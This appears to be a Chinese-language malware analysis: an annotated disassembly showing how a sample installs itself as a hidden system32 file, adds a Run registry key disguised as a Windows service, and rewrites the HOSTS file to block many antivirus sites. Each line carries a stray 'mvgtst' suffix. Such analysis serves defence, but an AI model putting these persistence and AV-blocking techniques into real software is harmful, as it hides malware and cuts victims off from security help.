00402BB4 50 PUSH EAXmvgtst
00402BB5 E8 80440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memsetmvgtst
00402BBA 83C4 0C ADD ESP,0Cmvgtst
00402BBD 68 04010000 PUSH 104mvgtst
00402BC2 6A 00 PUSH 0mvgtst
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]mvgtst
00402BCA 50 PUSH EAXmvgtst
00402BCB E8 6A440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memsetmvgtst
00402BD0 83C4 0C ADD ESP,0Cmvgtst
00402BD3 68 04010000 PUSH 104mvgtst
00402BD8 6A 00 PUSH 0mvgtst
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]mvgtst
00402BE0 50 PUSH EAXmvgtst
00402BE1 E8 54440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memsetmvgtst
00402BE6 83C4 0C ADD ESP,0Cmvgtst
00402BE9 68 04010000 PUSH 104mvgtst
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]mvgtst
00402BF4 50 PUSH EAXmvgtst
00402BF5 6A 00 PUSH 0mvgtst
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleAmvgtst
00402BFD 50 PUSH EAXmvgtst
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameAmvgtst
00402C04 68 04010000 PUSH 104mvgtst
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]mvgtst
00402C0F 50 PUSH EAXmvgtst
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryAmvgtst
----------------------------------------------------------------------------------------------------mvgtst
****************************************************************************************************mvgtst
mvgtst
****************************************************************************************************mvgtst
二、样本分析部分：mvgtst
mvgtst
----------------------------------------------------------------------------------------------------mvgtst
1、当样本执行安装功能时的分析：mvgtst
mvgtst
00402B96 55 PUSH EBP ; 程序入口.mvgtst
00402B97 8BEC MOV EBP,ESPmvgtst
00402B99 81EC E4070000 SUB ESP,7E4mvgtst
00402B9F 6A 01 PUSH 1 ; ErrorMode = SEM_FAILCRITICALERRORSmvgtst
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0] ; kernel32.SetErrorModemvgtst
00402BA7 68 04010000 PUSH 104mvgtst
00402BAC 6A 00 PUSH 0mvgtst
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]mvgtst
00402BB4 50 PUSH EAXmvgtst
00402BB5 E8 80440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memsetmvgtst
00402BBA 83C4 0C ADD ESP,0Cmvgtst
00402BBD 68 04010000 PUSH 104mvgtst
00402BC2 6A 00 PUSH 0mvgtst
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]mvgtst
00402BCA 50 PUSH EAXmvgtst
00402BCB E8 6A440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memsetmvgtst
00402BD0 83C4 0C ADD ESP,0Cmvgtst
00402BD3 68 04010000 PUSH 104mvgtst
00402BD8 6A 00 PUSH 0mvgtst
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]mvgtst
00402BE0 50 PUSH EAXmvgtst
00402BE1 E8 54440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memsetmvgtst
00402BE6 83C4 0C ADD ESP,0Cmvgtst
00402BE9 68 04010000 PUSH 104mvgtst
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]mvgtst
00402BF4 50 PUSH EAXmvgtst
00402BF5 6A 00 PUSH 0mvgtst
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleAmvgtst
00402BFD 50 PUSH EAXmvgtst
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身当前路径名).mvgtst
00402C04 68 04010000 PUSH 104mvgtst
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]mvgtst
00402C0F 50 PUSH EAXmvgtst
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA(获取系统SYSTEM32文件夹路径名).mvgtst
00402C16 68 1BD7A201 PUSH 1A2D71Bmvgtst
00402C1B 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]mvgtst
00402C21 E8 4A040000 CALL misfotos.00403070 ; ASCII "waccs.exe"mvgtst
00402C26 50 PUSH EAXmvgtst
00402C27 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]mvgtst
00402C2D 50 PUSH EAXmvgtst
00402C2E 68 C9276909 PUSH 96927C9mvgtst
00402C33 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]mvgtst
00402C39 E8 D2030000 CALL misfotos.00403010 ; ASCII "%s\%s"mvgtst
00402C3E 50 PUSH EAXmvgtst
00402C3F 68 04010000 PUSH 104mvgtst
00402C44 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]mvgtst
00402C4A 50 PUSH EAXmvgtst
00402C4B E8 F0430000 CALL misfotos.00407040 ; JMP 到 msvcrt._snprintf(ASCII "C:\WINDOWS\system32\waccs.exe").mvgtst
00402C50 83C4 14 ADD ESP,14mvgtst
00402C53 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]mvgtst
00402C59 E8 28F3FFFF CALL misfotos.00401F86 ; 清除内存数据.mvgtst
00402C5E 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]mvgtst
00402C64 E8 85F4FFFF CALL misfotos.004020EE ; 清除内存数据.mvgtst
00402C69 68 2FD7A201 PUSH 1A2D72Fmvgtst
00402C6E 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]mvgtst
00402C74 E8 F7030000 CALL misfotos.00403070 ; ASCII "waccs.exe"mvgtst
00402C79 50 PUSH EAXmvgtst
00402C7A E8 F1140000 CALL misfotos.00404170 ; 在注册表中添加病毒启动项.mvgtst
00402C7F 59 POP ECXmvgtst
00402C80 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]mvgtst
00402C86 E8 63F4FFFF CALL misfotos.004020EE ; 清除内存数据.mvgtst
00402C8B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]mvgtst
00402C91 50 PUSH EAX ; /s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe"mvgtst
00402C92 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]mvgtst
00402C98 50 PUSH EAX ; |s1 = "C:\WINDOWS\system32\waccs.exe"mvgtst
00402C99 E8 04440000 CALL misfotos.004070A2 ; JMP 到 msvcrt.strcmp(字符串比较)mvgtst
00402C9E 59 POP ECXmvgtst
00402C9F 59 POP ECXmvgtst
00402CA0 85C0 TEST EAX,EAX ; 判断比较结果.mvgtst
00402CA2 74 70 JE SHORT misfotos.00402D14 ; 如果s2 != s1,则该病毒程序执行安装(安装功能)操作;如果s2 == s1,则该病毒程序执行恶意(主要功能)操作.mvgtst
00402CA4 83A5 A8F8FFFF 0>AND DWORD PTR SS:[EBP-758],0 ; 如果s2 != s1,则该病毒程序从这里开始执行安装操作.mvgtst
00402CAB EB 0D JMP SHORT misfotos.00402CBAmvgtst
00402CAD 8B85 A8F8FFFF MOV EAX,DWORD PTR SS:[EBP-758]mvgtst
00402CB3 40 INC EAXmvgtst
00402CB4 8985 A8F8FFFF MOV DWORD PTR SS:[EBP-758],EAXmvgtst
00402CBA 83BD A8F8FFFF 0>CMP DWORD PTR SS:[EBP-758],5mvgtst
00402CC1 7D 1E JGE SHORT misfotos.00402CE1mvgtst
00402CC3 6A 00 PUSH 0 ; /FailIfExists = FALSEmvgtst
00402CC5 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]mvgtst
00402CCB 50 PUSH EAX ; |NewFileName = "C:\WINDOWS\system32\waccs.exe"mvgtst
00402CCC 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]mvgtst
00402CD2 50 PUSH EAX ; |s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe"mvgtst
00402CD3 FF15 90804000 CALL DWORD PTR DS:[408090] ; kernel32.CopyFileAmvgtst
00402CD9 85C0 TEST EAX,EAX ; 判断执行的结果.mvgtst
00402CDB 74 02 JE SHORT misfotos.00402CDF ; 如果文件拷贝成功,则不执行跳转功能;如果文件拷贝失败,则跳到"00402CDF"地址处.mvgtst
00402CDD EB 02 JMP SHORT misfotos.00402CE1 ; 文件拷贝成功,跳到"00402CE1"地址处继续执行后面的操作.mvgtst
00402CDF ^ EB CC JMP SHORT misfotos.00402CAD ; 跳回去重新执行文件拷贝操作代码.mvgtst
00402CE1 6A 07 PUSH 7mvgtst
00402CE3 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754] ; /FileAttributes = READONLY|HIDDEN|SYSTEMmvgtst
00402CE9 50 PUSH EAX ; |FileName = "C:\WINDOWS\system32\waccs.exe"mvgtst
00402CEA FF15 8C804000 CALL DWORD PTR DS:[40808C] ; kernel32.SetFileAttributesA(设置文件属性为：只读、系统、隐藏).mvgtst
00402CF0 6A 00 PUSH 0mvgtst
00402CF2 6A 00 PUSH 0mvgtst
00402CF4 6A 00 PUSH 0mvgtst
00402CF6 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]mvgtst
00402CFC 50 PUSH EAX ; FileName = "C:\WINDOWS\system32\waccs.exe"mvgtst
00402CFD 68 C4914000 PUSH misfotos.004091C4 ; ASCII "open"mvgtst
00402D02 6A 00 PUSH 0mvgtst
00402D04 FF15 74814000 CALL DWORD PTR DS:[408174] ; SHELL32.ShellExecuteA(调用运行拷贝后的病毒程序"waccs.exe").mvgtst
00402D0A E8 61060000 CALL misfotos.00403370 ; 在HOSTS域名映像劫持文件中添加N个安全网站域名地址,不让用户访问这些网站.mvgtst
00402D0F E8 F9120000 CALL misfotos.0040400D ; 安装程序关闭退出，并执行自我删除操作.mvgtst
00402D14 FF15 88804000 CALL DWORD PTR DS:[408088] ; ntdll.RtlGetLastWin32Error(如果s2 == s1,则该病毒程序从这里开始执行恶意操作.)mvgtst
----------------------------------------------------------mvgtst
在注册表中添加病毒启动项：mvgtst
00404170 55 PUSH EBPmvgtst
00404171 8BEC MOV EBP,ESPmvgtst
00404173 81EC 8C000000 SUB ESP,8Cmvgtst
00404179 6A 00 PUSH 0mvgtst
0040417B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]mvgtst
0040417E 50 PUSH EAXmvgtst
0040417F 6A 00 PUSH 0mvgtst
00404181 68 3F000F00 PUSH 0F003Fmvgtst
00404186 6A 00 PUSH 0mvgtst
00404188 6A 00 PUSH 0mvgtst
0040418A 6A 00 PUSH 0mvgtst
0040418C 68 CAFEBB29 PUSH 29BBFECAmvgtst
00404191 8D4D CC LEA ECX,DWORD PTR SS:[EBP-34]mvgtst
00404194 E8 4C060000 CALL misfotos.004047E5 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"mvgtst
00404199 50 PUSH EAX ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"mvgtst
0040419A 68 02000080 PUSH 80000002mvgtst
0040419F FF15 08804000 CALL DWORD PTR DS:[408008] ; ADVAPI32.RegCreateKeyExA(hKey = HKEY_LOCAL_MACHINE).mvgtst
004041A5 8D4D CC LEA ECX,DWORD PTR SS:[EBP-34]mvgtst
004041A8 E8 08010000 CALL misfotos.004042B5 ; 清除内存数据.mvgtst
004041AD 837D 08 00 CMP DWORD PTR SS:[EBP+8],0mvgtst
004041B1 74 32 JE SHORT misfotos.004041E5mvgtst
004041B3 FF75 08 PUSH DWORD PTR SS:[EBP+8] ; String = "waccs.exe"mvgtst
004041B6 FF15 D8804000 CALL DWORD PTR DS:[4080D8] ; kernel32.lstrlenAmvgtst
004041BC 50 PUSH EAXmvgtst
004041BD FF75 08 PUSH DWORD PTR SS:[EBP+8]mvgtst
004041C0 6A 01 PUSH 1mvgtst
004041C2 6A 00 PUSH 0mvgtst
004041C4 68 4E9127A1 PUSH A127914Emvgtst
004041C9 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]mvgtst
004041CC E8 74060000 CALL misfotos.00404845 ; ASCII "Windows Activation Control Center Service"mvgtst
004041D1 50 PUSH EAX ; ASCII "Windows Activation Control Center Service"mvgtst
004041D2 FF75 FC PUSH DWORD PTR SS:[EBP-4]mvgtst
004041D5 FF15 04804000 CALL DWORD PTR DS:[408004] ; ADVAPI32.RegSetValueExAmvgtst
004041DB 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]mvgtst
004041DE E8 FA000000 CALL misfotos.004042DD ; 清除内存数据.mvgtst
004041E3 EB 25 JMP SHORT misfotos.0040420Amvgtst
004041E5 68 7A9127A1 PUSH A127917Amvgtst
004041EA 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]mvgtst
004041F0 E8 50060000 CALL misfotos.00404845 ; 清除内存数据.mvgtst
004041F5 50 PUSH EAXmvgtst
004041F6 FF75 FC PUSH DWORD PTR SS:[EBP-4]mvgtst
004041F9 FF15 00804000 CALL DWORD PTR DS:[408000] ; ADVAPI32.RegDeleteValueAmvgtst
004041FF 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]mvgtst
00404205 E8 D3000000 CALL misfotos.004042DD ; 清除内存数据.mvgtst
0040420A FF75 FC PUSH DWORD PTR SS:[EBP-4]mvgtst
0040420D FF15 18804000 CALL DWORD PTR DS:[408018] ; ADVAPI32.RegCloseKeymvgtst
00404213 C9 LEAVEmvgtst
00404214 C3 RETN ; 返回.mvgtst
mvgtst
mvgtst
在HOSTS域名映像劫持文件中添加N个安全网站域名地址,不让用户访问这些网站：mvgtst
00403370 55 PUSH EBPmvgtst
00403371 8BEC MOV EBP,ESPmvgtst
00403373 81EC E0030000 SUB ESP,3E0mvgtst
00403379 68 04010000 PUSH 104mvgtst
0040337E 6A 00 PUSH 0mvgtst
00403380 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]mvgtst
00403386 50 PUSH EAXmvgtst
00403387 E8 AE3C0000 CALL misfotos.0040703A ; JMP 到 msvcrt.memsetmvgtst
0040338C 83C4 0C ADD ESP,0Cmvgtst
0040338F 68 04010000 PUSH 104mvgtst
00403394 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]mvgtst
0040339A 50 PUSH EAXmvgtst
0040339B FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA(获取系统SYSTEM32文件夹路径名).mvgtst
004033A1 68 04010000 PUSH 104mvgtst
004033A6 68 E6430183 PUSH 830143E6mvgtst
004033AB 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]mvgtst
004033B1 E8 4F0F0000 CALL misfotos.00404305 ; ASCII "\drivers\etc\hosts"mvgtst
004033B6 50 PUSH EAX ; ASCII "\drivers\etc\hosts"mvgtst
004033B7 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]mvgtst
004033BD 50 PUSH EAX ; ASCII "C:\WINDOWS\system32"mvgtst
004033BE E8 6B3C0000 CALL misfotos.0040702E ; JMP 到 msvcrt.strncat(ASCII "C:\WINDOWS\system32\drivers\etc\hosts").mvgtst
004033C3 83C4 0C ADD ESP,0Cmvgtst
004033C6 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]mvgtst
004033CC E8 C5EAFFFF CALL misfotos.00401E96 ; 清除内存数据.mvgtst
004033D1 68 38924000 PUSH misfotos.00409238 ; /mode = "w"mvgtst
004033D6 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]mvgtst
004033DC 50 PUSH EAX ; |path = "C:\WINDOWS\system32\drivers\etc\hosts"mvgtst
004033DD E8 D83C0000 CALL misfotos.004070BA ; JMP 到 msvcrt.fopen(打开HOSTS域名映像劫持文件)mvgtst
004033E2 59 POP ECXmvgtst
004033E3 59 POP ECXmvgtst
004033E4 8985 B8FDFFFF MOV DWORD PTR SS:[EBP-248],EAXmvgtst
004033EA 83BD B8FDFFFF 0>CMP DWORD PTR SS:[EBP-248],0mvgtst
004033F1 75 07 JNZ SHORT misfotos.004033FAmvgtst
004033F3 32C0 XOR AL,ALmvgtst
004033F5 E9 18060000 JMP misfotos.00403A12mvgtst
004033FA 68 AF305D14 PUSH 145D30AFmvgtst
004033FF 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]mvgtst
00403405 E8 5B0F0000 CALL misfotos.00404365 ; ASCII "# Copyright (c) 1993-1999 Microsoft Corp.mvgtst
#mvgtst
"mvgtst
0040340A 50 PUSH EAX ; /format = "# Copyright (c) 1993-1999 Microsoft Corp.mvgtst
#mvgtst
"mvgtst
0040340B FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248] ; |stream = msvcrt.77C2FCE0mvgtst
00403411 E8 9E3C0000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintfmvgtst
00403416 59 POP ECXmvgtst
00403417 59 POP ECXmvgtst
00403418 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]mvgtst
0040341E E8 F20D0000 CALL misfotos.00404215 ; 清除内存数据.mvgtst
00403423 68 981A4325 PUSH 25431A98mvgtst
00403428 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]mvgtst
0040342E E8 920F0000 CALL misfotos.004043C5 ; ASCII "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.mvgtst
#mvgtst
mvgtst
"mvgtst
00403433 50 PUSH EAX ; /format = "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.mvgtst
#mvgtst
mvgtst
"mvgtst
00403434 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248] ; |stream = msvcrt.77C2FCE0mvgtst
0040343A E8 753C0000 CALL misfotos.004070B4 ; JMP 到 msvcrt.fprintfmvgtst
0040343F 59 POP ECXmvgtst
00403440 59 POP ECXmvgtst
00403441 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]mvgtst
00403447 E8 F10D0000 CALL misfotos.0040423D ; 清除内存数据mvgtst
mvgtst
0040344C C785 C0FDFFFF B>MOV DWORD PTR SS:[EBP-240],misfotos.0040>; merijn.orgmvgtst
00403456 C785 C4FDFFFF C>MOV DWORD PTR SS:[EBP-23C],misfotos.0040>; www.merijn.orgmvgtst
00403460 C785 C8FDFFFF D>MOV DWORD PTR SS:[EBP-238],misfotos.0040>; www.spywareinfo.comspywareinfo.c ... fowww.viruslist.commvgtst
0040346A C785 CCFDFFFF E>MOV DWORD PTR SS:[EBP-234],misfotos.0040>; spywareinfo.comwww.spybot.infospybot.infowww.viruslist.commvgtst
00403474 C785 D0FDFFFF F>MOV DWORD PTR SS:[EBP-230],misfotos.0040>; www.spybot.infospybot.infowww.viruslist.commvgtst
0040347E C785 D4FDFFFF 0>MOV DWORD PTR SS:[EBP-22C],misfotos.0040>; spybot.infowww.viruslist.commvgtst
00403488 C785 D8FDFFFF 1>MOV DWORD PTR SS:[EBP-228],misfotos.0040>; www.viruslist.commvgtst
00403492 C785 DCFDFFFF 2>MOV DWORD PTR SS:[EBP-224],misfotos.0040>; viruslist.commvgtst
0040349C C785 E0FDFFFF 3>MOV DWORD PTR SS:[EBP-220],misfotos.0040>; www.hijackthis.demvgtst
004034A6 C785 E4FDFFFF 5>MOV DWORD PTR SS:[EBP-21C],misfotos.0040>; hijackthis.demvgtst
004034B0 C785 E8FDFFFF 6>MOV DWORD PTR SS:[EBP-218],misfotos.0040>; www.majorgeeks.commvgtst
004034BA C785 ECFDFFFF 7>MOV DWORD PTR SS:[EBP-214],misfotos.0040>; majorgeeks.commvgtst
004034C4 C785 F0FDFFFF 8>MOV DWORD PTR SS:[EBP-210],misfotos.0040>; www.virustotal.commvgtst
004034CE C785 F4FDFFFF 9>MOV DWORD PTR SS:[EBP-20C],misfotos.0040>; virustotal.commvgtst
004034D8 C785 F8FDFFFF A>MOV DWORD PTR SS:[EBP-208],misfotos.0040>; kaspersky.commvgtst
004034E2 C785 FCFDFFFF B>MOV DWORD PTR SS:[EBP-204],misfotos.0040>; kaspersky-labs.commvgtst
004034EC C785 00FEFFFF C>MOV DWORD PTR SS:[EBP-200],misfotos.0040>; www.kaspersky.commvgtst
004034F6 C785 04FEFFFF E>MOV DWORD PTR SS:[EBP-1FC],misfotos.0040>; www.sophos.commvgtst
00403500 C785 08FEFFFF F>MOV DWORD PTR SS:[EBP-1F8],misfotos.0040>; sophosmvgtst
0040350A C785 0CFEFFFF F>MOV DWORD PTR SS:[EBP-1F4],misfotos.0040>; securityresponse.symantec.commvgtst
00403514 C785 10FEFFFF 1>MOV DWORD PTR SS:[EBP-1F0],misfotos.0040>; symantec.commvgtst
0040351E C785 14FEFFFF 2>MOV DWORD PTR SS:[EBP-1EC],misfotos.0040>; www.symantec.commvgtst
00403528 C785 18FEFFFF 3>MOV DWORD PTR SS:[EBP-1E8],misfotos.0040>; updates.symantec.commvgtst
00403532 C785 1CFEFFFF 5>MOV DWORD PTR SS:[EBP-1E4],misfotos.0040>; liveupdate.symantecliveupdate.commvgtst
0040353C C785 20FEFFFF 7>MOV DWORD PTR SS:[EBP-1E0],misfotos.0040>; liveupdate.symantec.comcustomer.symantec.commvgtst
00403546 C785 24FEFFFF 9>MOV DWORD PTR SS:[EBP-1DC],misfotos.0040>; customer.symantec.commvgtst
00403550 C785 28FEFFFF A>MOV DWORD PTR SS:[EBP-1D8],misfotos.0040>; update.symantec.comwww.mcafee.commvgtst
0040355A C785 2CFEFFFF B>MOV DWORD PTR SS:[EBP-1D4],misfotos.0040>; www.mcafee.commvgtst
00403564 C785 30FEFFFF C>MOV DWORD PTR SS:[EBP-1D0],misfotos.0040>; mcafee.commvgtst
0040356E C785 34FEFFFF D>MOV DWORD PTR SS:[EBP-1CC],misfotos.0040>; rads.mcafee.commast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.commvgtst
00403578 C785 38FEFFFF E>MOV DWORD PTR SS:[EBP-1C8],misfotos.0040>; mast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.commvgtst
00403582 C785 3CFEFFFF F>MOV DWORD PTR SS:[EBP-1C4],misfotos.0040>; download.mcafee.comdispatch.mcafee.comus.mcafee.commvgtst
0040358C C785 40FEFFFF 0>MOV DWORD PTR SS:[EBP-1C0],misfotos.0040>; dispatch.mcafee.comus.mcafee.commvgtst
00403596 C785 44FEFFFF 2>MOV DWORD PTR SS:[EBP-1BC],misfotos.0040>; us.mcafee.commvgtst
004035A0 C785 48FEFFFF 3>MOV DWORD PTR SS:[EBP-1B8],misfotos.0040>; www.trendsecure.comtrendsecure.c ... seclab.tuwien.ac.atmvgtst
004035AA C785 4CFEFFFF 4>MOV DWORD PTR SS:[EBP-1B4],misfotos.0040>; trendsecure.comwww.avp.comavp.comanalysis.seclab.tuwien.ac.atmvgtst
004035B4 C785 50FEFFFF 5>MOV DWORD PTR SS:[EBP-1B0],misfotos.0040>; www.avp.comavp.comanalysis.seclab.tuwien.ac.atmvgtst
004035BE C785 54FEFFFF 6>MOV DWORD PTR SS:[EBP-1AC],misfotos.0040>; avp.comanalysis.seclab.tuwien.ac.atmvgtst
004035C8 C785 58FEFFFF 6>MOV DWORD PTR SS:[EBP-1A8],misfotos.0040>; analysis.seclab.tuwien.ac.atmvgtst
004035D2 C785 5CFEFFFF 8>MOV DWORD PTR SS:[EBP-1A4],misfotos.0040>; www.bleepingcomputer.commvgtst
004035DC C785 60FEFFFF A>MOV DWORD PTR SS:[EBP-1A0],misfotos.0040>; bleepingcomputer.commvgtst
004035E6 C785 64FEFFFF B>MOV DWORD PTR SS:[EBP-19C],misfotos.0040>; guru0.grisoft.czmvgtst
004035F0 C785 68FEFFFF D>MOV DWORD PTR SS:[EBP-198],misfotos.0040>; guru1.grisoft.czmvgtst
004035FA C785 6CFEFFFF E>MOV DWORD PTR SS:[EBP-194],misfotos.0040>; guru2.grisoft.czmvgtst
00403604 C785 70FEFFFF F>MOV DWORD PTR SS:[EBP-190],misfotos.0040>; guru3.grisoft.czmvgtst
0040360E C785 74FEFFFF 0>MOV DWORD PTR SS:[EBP-18C],misfotos.0040>; guru4.grisoft.czmvgtst
00403618 C785 78FEFFFF 2>MOV DWORD PTR SS:[EBP-188],misfotos.0040>; guru5.grisoft.czmvgtst
00403622 C785 7CFEFFFF 3>MOV DWORD PTR SS:[EBP-184],misfotos.0040>; download.f-secure.commvgtst
0040362C C785 80FEFFFF 4>MOV DWORD PTR SS:[EBP-180],misfotos.0040>; www.download.f-secure.commvgtst
00403636 C785 84FEFFFF 6>MOV DWORD PTR SS:[EBP-17C],misfotos.0040>; avg-antivirus.netmvgtst
00403640 C785 88FEFFFF 7>MOV DWORD PTR SS:[EBP-178],misfotos.0040>; www.avg-antivirus.netmvgtst
0040364A C785 8CFEFFFF 9>MOV DWORD PTR SS:[EBP-174],misfotos.0040>; f-secure.commvgtst
00403654 C785 90FEFFFF A>MOV DWORD PTR SS:[EBP-170],misfotos.0040>; www.f-secure.commvgtst
0040365E C785 94FEFFFF B>MOV DWORD PTR SS:[EBP-16C],misfotos.0040>; free.grisoft.commvgtst
00403668 C785 98FEFFFF C>MOV DWORD PTR SS:[EBP-168],misfotos.0040>; www.free.grisoft.commvgtst
00403672 C785 9CFEFFFF E>MOV DWORD PTR SS:[EBP-164],misfotos.0040>; free.avg.commvgtst
0040367C C785 A0FEFFFF F>MOV DWORD PTR SS:[EBP-160],misfotos.0040>; www.free.avg.commvgtst
00403686 C785 A4FEFFFF 0>MOV DWORD PTR SS:[EBP-15C],misfotos.0040>; avast.commvgtst
00403690 C785 A8FEFFFF 1>MOV DWORD PTR SS:[EBP-158],misfotos.0040>; www.avast.commvgtst
0040369A C785 ACFEFFFF 2>MOV DWORD PTR SS:[EBP-154],misfotos.0040>; onlinescan.avast.commvgtst
004036A4 C785 B0FEFFFF 3>MOV DWORD PTR SS:[EBP-150],misfotos.0040>; www.onlinescan.avast.commvgtst
004036AE C785 B4FEFFFF 5>MOV DWORD PTR SS:[EBP-14C],misfotos.0040>; housecall.trendmicro.commvgtst
004036B8 C785 B8FEFFFF 7>MOV DWORD PTR SS:[EBP-148],misfotos.0040>; www.housecall.trendmicro.commvgtst
004036C2 C785 BCFEFFFF 9>MOV DWORD PTR SS:[EBP-144],misfotos.0040>; free.avg.commvgtst
004036CC C785 C0FEFFFF A>MOV DWORD PTR SS:[EBP-140],misfotos.0040>; www.free.avg.commvgtst
004036D6 C785 C4FEFFFF B>MOV DWORD PTR SS:[EBP-13C],misfotos.0040>; bitdefender.comwww.bitdefender.comtrendsecure.comwww.trendsecure.comfuturenow.bitdefender.commvgtst
004036E0 C785 C8FEFFFF C>MOV DWORD PTR SS:[EBP-138],misfotos.0040>; www.bitdefender.comtrendsecure.c ... now.bitdefender.commvgtst
004036EA C785 CCFEFFFF D>MOV DWORD PTR SS:[EBP-134],misfotos.0040>; trendsecure.comwww.trendsecure.comfuturenow.bitdefender.commvgtst
004036F4 C785 D0FEFFFF E>MOV DWORD PTR SS:[EBP-130],misfotos.0040>; www.trendsecure.comfuturenow.bitdefender.commvgtst
004036FE C785 D4FEFFFF 0>MOV DWORD PTR SS:[EBP-12C],misfotos.0040>; futurenow.bitdefender.commvgtst
00403708 C785 D8FEFFFF 1>MOV DWORD PTR SS:[EBP-128],misfotos.0040>; www.futurenow.bitdefender.commvgtst
00403712 C785 DCFEFFFF 3>MOV DWORD PTR SS:[EBP-124],misfotos.0040>; f-prot.commvgtst
0040371C C785 E0FEFFFF 4>MOV DWORD PTR SS:[EBP-120],misfotos.0040>; www.f-prot.commvgtst
00403726 C785 E4FEFFFF 5>MOV DWORD PTR SS:[EBP-11C],misfotos.0040>; eset.commvgtst
00403730 C785 E8FEFFFF 6>MOV DWORD PTR SS:[EBP-118],misfotos.0040>; www.eset.commvgtst
0040373A C785 ECFEFFFF 7>MOV DWORD PTR SS:[EBP-114],misfotos.0040>; free-av.comwww.free-av.comavira.commvgtst
00403744 C785 F0FEFFFF 8>MOV DWORD PTR SS:[EBP-110],misfotos.0040>; www.free-av.comavira.commvgtst
0040374E C785 F4FEFFFF 9>MOV DWORD PTR SS:[EBP-10C],misfotos.0040>; avira.commvgtst
00403758 C785 F8FEFFFF 9>MOV DWORD PTR SS:[EBP-108],misfotos.0040>; www.avira.commvgtst
00403762 C785 FCFEFFFF A>MOV DWORD PTR SS:[EBP-104],misfotos.0040>; free.avg.commvgtst
0040376C C785 00FFFFFF B>MOV DWORD PTR SS:[EBP-100],misfotos.0040>; www.free.avg.commvgtst
00403776 C785 04FFFFFF D>MOV DWORD PTR SS:[EBP-FC],misfotos.00409>; antivir.esmvgtst
00403780 C785 08FFFFFF D>MOV DWORD PTR SS:[EBP-F8],misfotos.00409>; www.antivir.esmvgtst
0040378A C785 0CFFFFFF E>MOV DWORD PTR SS:[EBP-F4],misfotos.00409>; ikarus.netmvgtst
00403794 C785 10FFFFFF F>MOV DWORD PTR SS:[EBP-F0],misfotos.00409>; www.ikarus.netmvgtst
0040379E C785 14FFFFFF 0>MOV DWORD PTR SS:[EBP-EC],misfotos.00409>; prevx.commvgtst
004037A8 C785 18FFFFFF 1>MOV DWORD PTR SS:[EBP-E8],misfotos.00409>; www.prevx.commvgtst
004037B2 C785 1CFFFFFF 2>MOV DWORD PTR SS:[EBP-E4],misfotos.00409>; 2-spyware.commvgtst
